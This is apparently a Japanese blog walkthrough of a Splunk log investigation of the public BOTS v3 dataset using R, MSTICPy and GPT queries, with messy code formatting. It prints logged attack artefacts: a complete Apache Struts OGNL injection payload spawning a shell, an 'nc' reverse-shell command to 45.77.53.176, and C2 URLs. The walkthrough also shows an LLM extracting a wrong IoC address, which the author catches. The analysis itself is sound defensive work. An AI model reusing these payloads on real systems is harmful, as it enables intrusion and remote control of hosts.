::p_load(tidyverse, reticulate)
pacman<- import("msticpy")
mp <- mp$QueryProvider("Splunk")
qry_splunk $connect() qry_splunk
Credential loading from msticpyconfig.yaml file.
username/password method is selected.
Connected.
この文書は、Splunkを用いたログ調査の過程記録手法の一例を示すものです。題材には、インデックスが公開されている Boss of the SOC v3のデータセットを用います。インデックス名はbotsv3です。
調査に先立ち、SplunkにAPI接続してデータが取得できるかどうかを試験します。API接続には、Microsoftが提供するMSTICPyというツールをラッパーとして利用します。このツールは名前が示唆する通りPythonモジュールですが、私はR使いなので、Reticulateパッケージを用いてRから利用します。
::p_load(tidyverse, reticulate)
pacman<- import("msticpy")
mp <- mp$QueryProvider("Splunk")
qry_splunk $connect() qry_splunk
Credential loading from msticpyconfig.yaml file.
username/password method is selected.
Connected.
正常に接続できています。
次に、標準搭載されているデータに簡単なクエリを投げ、データフレームを表示させます。
MSTICPyはtableを自動的にPandasデータフレームに変換します。そしてReticulateパッケージは、Pandasデータフレームをそのまま扱えます。
<- r"(
spl | inputlookup security_example_data.csv
| table timestamp threat_src_ip threat_dest_ip threat_status threat_type
| head 5
)"
<- qry_splunk$exec_query(spl, timeout=300)
df_1st
df_1st
データフレームが表示できています。なお、SplunkのAPIを経由すると、フィールドの型がすべて文字列になる点に留意してください。(これはSplunk側の仕様です。)
うまくいきました。それでは調査に着手しましょう。以下では臨場感を出すために、常体を用いるようにします。
# AIのMarkdownを地と区別するための補助関数
<- function(x){
ai_out <- paste0(
ai_block "::: {.callout-tip title='AIの回答'}\n\n",
x,"\n\n:::"
)|> knitr::asis_output()
ai_block
}
# インタラクティブなテーブルにするための補助関数
::p_load(DT)
pacman<- function(x){
create_dt ::datatable(
DT
x,filter = 'top',
options = list(
autoWidth = TRUE,
scrollX = TRUE,
scrollY = "400px",
dom = 'Blfrtip',
buttons = c('copy', 'csv', 'excel', 'pdf', 'print')
),extensions = 'Buttons',
) }
インデックスにどんなイベントが記録されているか、まったく分からない。(公式ウェブサイトにはsourcetypeは記載されている。)まず、hostとsourcetypeとを一覧化する。行数や初出・終出を合わせて出しておくと得られるものがあるかもしれない。
<- r"(
spl search index=botsv3 earliest=0
| stats count, earliest(_time) as first_seen,
latest(_time) as last_seen by host, sourcetype
)"
<- qry_splunk$exec_query(spl, timeout=300)
df_host
<-
df_host_m |>
df_host as_tibble() |>
mutate(
count = as.integer(count),
first_seen = as.double(first_seen) |> as_datetime(tz = "UTC"),
last_seen = as.double(last_seen) |> as_datetime(tz = "UTC")
)
create_dt(df_host_m)
全部で30ホストある。たとえば「-L」で終わるホスト名はWindows端末だろう。推測をOpenAIにやらせてみる。
<-
csv_host |>
df_host_m select(host, sourcetype) |>
format_csv()
<- str_c(
q_ai "次のデータを、hostフィールドの値のパターンに従って分類し、結果を示してください。
sourcetypeフィールドからOSや環境が推測できるなら、それも加えてください。
分類名, ホスト名, 付加情報の順で、1ホストを1行で出力してください。
分類不明なものは、分類名を不明としてください。",
"データ:\n",
csv_host)
::p_load(ellmer)
pacman<- chat_openai(model = "gpt-4o-mini")
chat <- chat$chat(q_ai, echo = "none")
ans
ai_out(ans)
以下が、指定されたデータを分類した結果になります。
Windows, ABUNGST-L, Windows OS
Windows, BGIST-L, Windows OS
Windows, BSTOLL-L, Windows OS
Windows, BTUN-L, Windows OS
Windows, FYODOR-L, Windows OS
Windows, JWORTOS-L, Windows OS
Windows, MKRAEUS-L, Windows OS
Windows, PCERF-L, Windows OS
Windows, SEPM, Windows OS
不明, console.us.code42.com:443, 不明
Unix, gacrux.i-06fea586f3d3c8ce8, Linux
Unix, gacrux.i-0920036c8ca91e501, Linux
Unix, gacrux.i-09cbc261e84259b54, Linux
Unix, gacrux.i-0cc93bade2b3cba63, Linux
Unix, hoth, Linux
不明, ip-172-16-0-109.ec2.internal, 不明
不明, ip-172-16-0-127, 不明
不明, ip-172-16-0-13, 不明
不明, ip-172-16-0-145, 不明
不明, ip-172-16-0-178, 不明
不明, ip-172-31-12-76, 不明
不明, ip-172-31-36-235, 不明
Unix, mars.i-08e52f8b5a034012d, Linux
不明, matar, 不明
不明, ntesla, 不明
不明, serverless, 不明
不明, splunk.froth.ly, 不明
不明, splunkhwf.froth.ly, 不明
注釈: - 分類は「Windows」または「Unix」に基づいています。- 不明な分類は、ホスト名やデータが特定できなかった場合に設定されています。
<- chat$chat("splunk.froth.lyというホストには、どんなデータがありますか?",
ans echo = "none")
ai_out(ans)
ホスト名 splunk.froth.ly
には以下のデータが含まれています:
このホストでは、AWS関連のログやMicrosoftのAAD及びO365の監査データが収集されています。
ここではMicrosoft 365関係のデータに注目する。
有用なフィールドの有無をチェックするため、サマリをとる。
<- r"(
spl search index=botsv3 earliest=0
sourcetype="ms:aad:signin"
| fieldsummary
)"
<- qry_splunk$exec_query(spl, timeout=300)
df_aadsignin_sum create_dt(df_aadsignin_sum)
Azure ADのサインインログを取得するAPIには、1.0とBetaとの2つのバージョンがある。今回は1.0が使用されているようで、フィールドが限定的である。少なくともsrc_ipのASNは知りたいところだ。このSplunkにはエンリッチメントのためのAppを入れていないので、ip-apiを使って手元でエンリッチメントできるようにしておく。
::p_load(httr2)
pacman
# IPアドレスを問い合わせてASNを取得する(非ベクトル関数)
<- function(ip) {
get_asn <- str_glue("http://ip-api.com/json/{ip}?fields=as")
url <- tryCatch(
resp request(url) |> req_throttle(rate = 4/10) |>
req_perform() |> resp_body_json(),
error = function(e) return(list(as = NA))
)$as
resp
}
<- r"(
spl search index=botsv3 earliest=0
sourcetype="ms:aad:signin"
| fields src_ip
| dedup src_ip
| table src_ip
| sort 0 src_ip
)"
<- qry_splunk$exec_query(spl, timeout=300)
df_src
<-
df_src_enriched |>
df_src mutate(asn = map_chr(src_ip, get_asn)) |>
mutate(asn = if_else(asn == "", "--", asn))
df_src_enriched
現時点ではASNが引けないIPアドレスも存在するようだ。
src_ip別にサインイン状況を点検する。それにはvalues()が有効だが、データフレームで多値フィールドを扱うとリストになるので、リストの要素を出力するためには展開しなくてはならない。以下では、展開と合わせてエンリッチメントを行う。
<- r"(
spl search index=botsv3 earliest=0
sourcetype="ms:aad:signin"
| table _time, app, user, src_ip, location.country, loginStatus, deviceInformation
| stats values(*), earliest(_time) as first_seen, latest(_time) as last_seen by src_ip
)"
<- qry_splunk$exec_query(spl, timeout=300)
df_aadsignin
<-
df_aad_enriched |>
df_aadsignin mutate(
first_seen = as.double(first_seen) |> as_datetime(tz = "UTC"),
last_seen = as.double(last_seen) |> as_datetime(tz = "UTC")
|>
) ::clean_names() |>
janitormutate(across(
starts_with("values_"),
~ map_chr(.x, ~ str_c(.x, collapse = " | "))
|>
)) rename_with(~ str_remove(.x, "^values_"), starts_with("values_")) |>
inner_join(df_src_enriched, by = "src_ip") |>
select(src_ip, location_country, first_seen, last_seen, asn, user, device_information, login_status, app)
create_dt(df_aad_enriched)
先頭行のsrc_ip=“104.207.83.63”(HK)には注目する価値がある。device_information欄を見ると、このIPアドレスだけWindows 7で、aBrowswer 3.5という特異な文字列がある。
また、src_ip=“157.97.121.132”およびsrc_ip=“199.66.91.253”も、2つのuserからのサインインがある。この3つのIPアドレスと関連するユーザーは、bgist、fyodor、bstoll、klagerfieldの4アカウント。これらのサインイン履歴を見てみよう。
<- r"(
spl search index=botsv3 earliest=0
sourcetype="ms:aad:signin"
src_ip IN ("104.207.83.63", "157.97.121.132", "199.66.91.253")
| table _time, app, user, src_ip, location.country, loginStatus, deviceInformation
| sort_time
)"
<- qry_splunk$exec_query(spl, timeout=300)
df_aadsignin2 <-
df_aadsignin2 |>
df_aadsignin2 ::clean_names() |>
janitormutate(time = as_datetime(time))
create_dt(df_aadsignin2)
サインインログにはExchangeの痕跡が見つかるので、メール追跡ログから先の3つのIPアドレスを検索する。
<- r"(
spl search index=botsv3 earliest=0
sourcetype="ms:o365:reporting:messagetrace"
src IN ("104.207.83.63", "157.97.121.132", "199.66.91.253")
| table _time, size, src, orig_src, orig_recipient, subject, action, MessageTraceId
| sort _time
)"
<- qry_splunk$exec_query(spl, timeout=300)
df_msgt <-
df_msgt |>
df_msgt as_tibble() |>
::clean_names() |>
janitormutate(time = as_datetime(time))
create_dt(df_msgt)
bgistが社内の他者にメールを送っている。2種類のsubjectのうち前者の「Draft Financial Plan for Brewery FY2019」は、最初のメールが検疫隔離されている。サイズから、添付ファイルが存在していた恐れがある。配信された2度目はサイズが小さくなっているので、攻撃者はリンク型などに切り替えているかもしれない。
続いて、これらのIPアドレスを統合監査ログから追う。
<- r"(
spl search index=botsv3 earliest=0
sourcetype="o365:management:activity"
("104.207.83.63" OR "157.97.121.132" OR "199.66.91.253")
| table _time, src, action, command, authentication_service, file_name, record_type, user_id, user_agent
| sort _time
)"
<- qry_splunk$exec_query(spl, timeout=300)
df_ual <-
df_ual |>
df_ual as_tibble() |>
::clean_names() |>
janitormutate(time = as_datetime(time))
create_dt(df_ual)
興味深い点が複数ある。
サインイン、メール追跡、統合監査の3つのログを元に、疑わしい2つのIPアドレス104.207.83.63と199.66.91.253とに関し、userとsrc_ipとでプロットする。
::p_load(scales)
pacman
<-
df_msgt_pr |>
df_msgt ::clean_names() |>
janitorselect(time, src, orig_src) |>
rename(user = orig_src, src_ip = src) |>
mutate(
time = as_datetime(time, tz = "UTC"),
log_src = "message"
)
<-
df_aad_pr |>
df_aadsignin2 ::clean_names() |>
janitorfilter(src_ip %in% c("104.207.83.63", "199.66.91.253")) |>
select(time, src_ip, user) |>
mutate(
time = as_datetime(time, tz = "UTC"),
log_src = "aad"
)
<-
df_ual_pr |>
df_ual ::clean_names() |>
janitorrename(user = user_id) |>
mutate(
time = as_datetime(time, tz = "UTC"),
src_ip = str_split_i(src, ":", 1),
log_src = "ual"
|>
) select(time, user, src_ip, log_src)
<-
df_m365_tmp |>
df_aad_pr bind_rows(df_msgt_pr) |>
bind_rows(df_ual_pr)
<-
p_m365 |>
df_m365_tmp group_by(user) |>
mutate(first_seen = min(time)) |>
ungroup() |>
ggplot(mapping = aes(x = time, y = reorder(user, desc(first_seen)),
shape = src_ip, color = log_src)) +
geom_point(alpha = 0.4, size = 2) +
scale_x_datetime(breaks = breaks_width("30 min"),
minor_breaks = breaks_width("5 min"),
labels = label_time("%H:%M")) +
labs(x = "2018-08-20 (UTC)", y = "")
p_m365
archive.tarの出元を確認する。
<- r"(
spl search index=botsv3 earliest=0
sourcetype=xmlwineventlog TERM(archive.tar)
| table _raw
)"
<- qry_splunk$exec_query(spl, timeout=300)
df_archive <- df_archive |> flatten_chr()
str_archive
df_archive
archive.tarはsysmonで捕捉されている。XMLをパースするかわりに、OpenAIに要点を問い合わせる。
<- str_c(
q_ai "侵害調査をしていて、archive.tarがダウンロードされたことを確認しました。
このXMLデータは、archive.tarが生成されたことと関係していますか?",
"データ:\n",
str_archive)
<- chat_openai(model = "gpt-4o-mini")
chat <- chat$chat(q_ai, echo = "none")
ans ai_out(ans)
はい、このXMLデータはarchive.tar
が生成されたことと関係しています。
XMLデータの中で、特に注目すべきポイントは以下の通りです:
<EventID>1</EventID>
: これは新しいプロセスの作成を示すSysmonイベントです。<Image>C:\Windows\System32\tar.exe</Image>
: これはtar.exe
がプロセスとして実行されたことを示しています。<CommandLine>"C:\Windows\system32\tar.exe" -cvzf archive.tar *</CommandLine>
: ここで、tar
コマンドが-cvzf archive.tar *
の引数で実行されています。-c
は新しいアーカイブの作成、-v
は詳細を表示、-z
はgzip圧縮、-f
はファイル名を指定しています。この場合、archive.tar
という名前のアーカイブが生成されています。また、現在の作業ディレクトリはC:\Users\FyodorMalteskesko\OneDrive - Frothly\
で、User
はNT AUTHORITY\SYSTEM
となっているため、システム権限でこのコマンドが実行されたことが分かります。
このデータに基づいて、archive.tar
は確かに.tar
ファイルとして生成されたことが示されており、それに関連する操作が行われたと確認できます。
親プロセスがPowerShellであることから、遠隔操作されている恐れを考える。そこで、Windowsイベントログから、当該ホスト「FYODOR-L」において「FromBase64String」というキーワードの記録を探ってみる。
<- r"(
spl search index=botsv3 earliest=0
sourcetype=WinEventLog
host="FYODOR-L" FromBase64String
| table _raw
)"
<- qry_splunk$exec_query(spl, timeout=300)
df_fydorl_base64 <- df_fydorl_base64 |> flatten_chr()
str_fydorl_base64
<- str_c(
q_ai "侵害調査をしています。端末FYODOR-Lにおいて、FromBase64Stringを持つ
Windowsイベントを抽出したところ、以下のデータが得られました。
状況を簡潔に説明し、IoCとして利用可能なIPアドレスやキーワードを出力してください。",
"データ:\n",
str_fydorl_base64)
<- chat_openai(model = "gpt-4o-mini")
chat <- chat$chat(q_ai, echo = "none")
ans ai_out(ans)
端末FYODOR-Lにおいて、PowerShellを介して実行されたスクリプトが検出されました。スクリプトは、リモートコマンドを実行する際にPowerShellのスクリプトブロックロギングを無効にする命令を含んでおり、システムの保護機能を回避しようとしています。また、HTTPリクエストを通じて悪意のあるサーバーにデータを送信している可能性があります。これにより、攻撃者がマルウェアやその他の悪意のあるコードを実行していることが示唆されます。
http://45.77.53.17/news.php
(Base64デコードを行った場合に出現)http://45.77.53.17/login/process.php
(Base64デコードを行った場合に出現)http://45.77.53.17/admin/get.php
(Base64デコードを行った場合に出現)このイベントログは、悪意ある活動が端末で行われている可能性を示す重要な証拠です。IPアドレスや上記のキーワードを使用して、追加の調査を行うことが推奨されます。
残念。IPアドレスを正しく抽出してくれなかった。自分で出力する。(第4オクテットに注目。LLMにとっては1バイトの違いだが、IoCとしては大違いだ。なお、コンパイル時によってはIPアドレスを正しく抽出してくれるときもある。このように、OpenAIの出力は必ずしも安定していない。)
<- "aAB0AHQAcABzADoALwAvADQANQAuADcANwAuADUAMwAuADEANwA2ADoANAA0ADMA"
b64str <- jsonlite::base64_dec(b64str)
rawstr <- rawstr[rawstr != as.raw(0x00)]
raw_clean rawToChar(raw_clean)
[1] "https://45.77.53.176:443"
45.77.53.176と関連するhostを調べる。
<- r"(
spl search index=botsv3 earliest=0
TERM(45.77.53.176)
| stats count by host
| sort 0 -count
)"
<- qry_splunk$exec_query(spl, timeout=300)
df_host_45 df_host_45
splunkhfwはやSEPMのように、ログで使われていると思えるものもあるし、FYODOR-LやABUNGST-Lは本IPとC2ビーコン通信を行っているようだ。hothやmatarは不明。
先の例ではポート番号が443だったもののプロトコルはHTTPだったので、stream:httpも見ておく。先頭1件だけ、以下に表示する。
<- r"(
spl search index=botsv3 earliest=0
TERM(45.77.53.176)
sourcetype="stream:http"
| head 1
| table *
)"
<- qry_splunk$exec_query(spl, timeout=300)
df_http_45 |>
df_http_45 ::clean_names() |>
janitorselect(time, src_ip, dest_ip, dest_port, uri_path, http_method, http_user_agent, form_data) |>
pivot_longer(everything(), names_to = "field", values_to = "value") |>
::kable() knitr
field | value |
---|---|
time | 2018-08-20T11:34:01.509+00:00 |
src_ip | 192.168.8.103 |
dest_ip | 192.168.9.30 |
dest_port | 8080 |
uri_path | /frothlyinventory/integration/saveGangster.action |
http_method | POST |
http_user_agent | python-requests/2.18.4 |
form_data | age=1&__checkbox_bustedBefore=true&name=${(#szgx=‘multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=‘/bin/sh 0/tmp/backpipe’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,‘/c’,#cmd}:{‘/bin/bash’,‘-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.close())}&description=1 |
Apache Strutsの脆弱性を利用して、45.77.53.176に対してリバースシェルを張ろうとしているようである。そしてその試みは、OSQeuryの結果を見ると成功しているようだ。
<- r"(
spl search index=botsv3 earliest=0
host=hoth sourcetype="osquery:results"
"45.77.53.176"
| head 1
| fields - _raw, date*, ssl*
| table *
)"
<- qry_splunk$exec_query(spl, timeout=300)
df_osq_45 |>
df_osq_45 as_tibble() |>
::clean_names() |>
janitorselect(time, action, columns_cmdline, columns_owner_uid, columns_path, columns_pid, columns_parent) |>
rename_with(~ str_remove(.x, "^columns_"), starts_with("columns_")) |>
pivot_longer(everything(), names_to = "field", values_to = "value") |>
::kable() knitr
field | value |
---|---|
time | 2018-08-20T11:34:49.000+00:00 |
action | added |
cmdline | “nc” “45.77.53.176” “8088” |
owner_uid | 0 |
path | /bin/nc.traditional |
pid | 17211 |
parent |
(調査はつづく……)
こんなふうに、考えたこととコードと結果とを合わせて記述することを、私は「文芸的ログ分析」と呼んでいます。むかし長久勝さんの「文芸的コンピューティング」に感銘を受け、ログ分析に適用することを考えていたものです。ここ数年で、MSTICPyやQuartoなど必要なピースがそろい、容易に実現できるようになりました。
RStudio Server上で分析を進める利点は、Splunk以外のデータソース(たとえばMicrosoft SentinelやElasticsearch、ひいては単純なテキストファイル)からもデータ取得可能なことです。また、QuartoからはPythonコードもBashコマンドも実行できますから、JSONデータの前処理にjqを使ってデータフレームに戻すこともできます。
いくつか注意点を記載します。
あらゆるログ分析を文芸的にやるのは、手間がかかりすぎます。何らかの理由で後日に残しておきたいものから着手するのがよいでしょう。
ログ分析の過程でも、マークダウン形式だけに依存すべきではありません。私はWebコンソールもRスクリプトも併用しますし、何より手で絵を描いたりノートを取ったりしています。
サーチ結果の量が大きくなるとき(たとえば長期間のデータ)には、MSTICPyを使わずCSVファイルに出力し、それをデータフレームに読み込むほうが効率的です。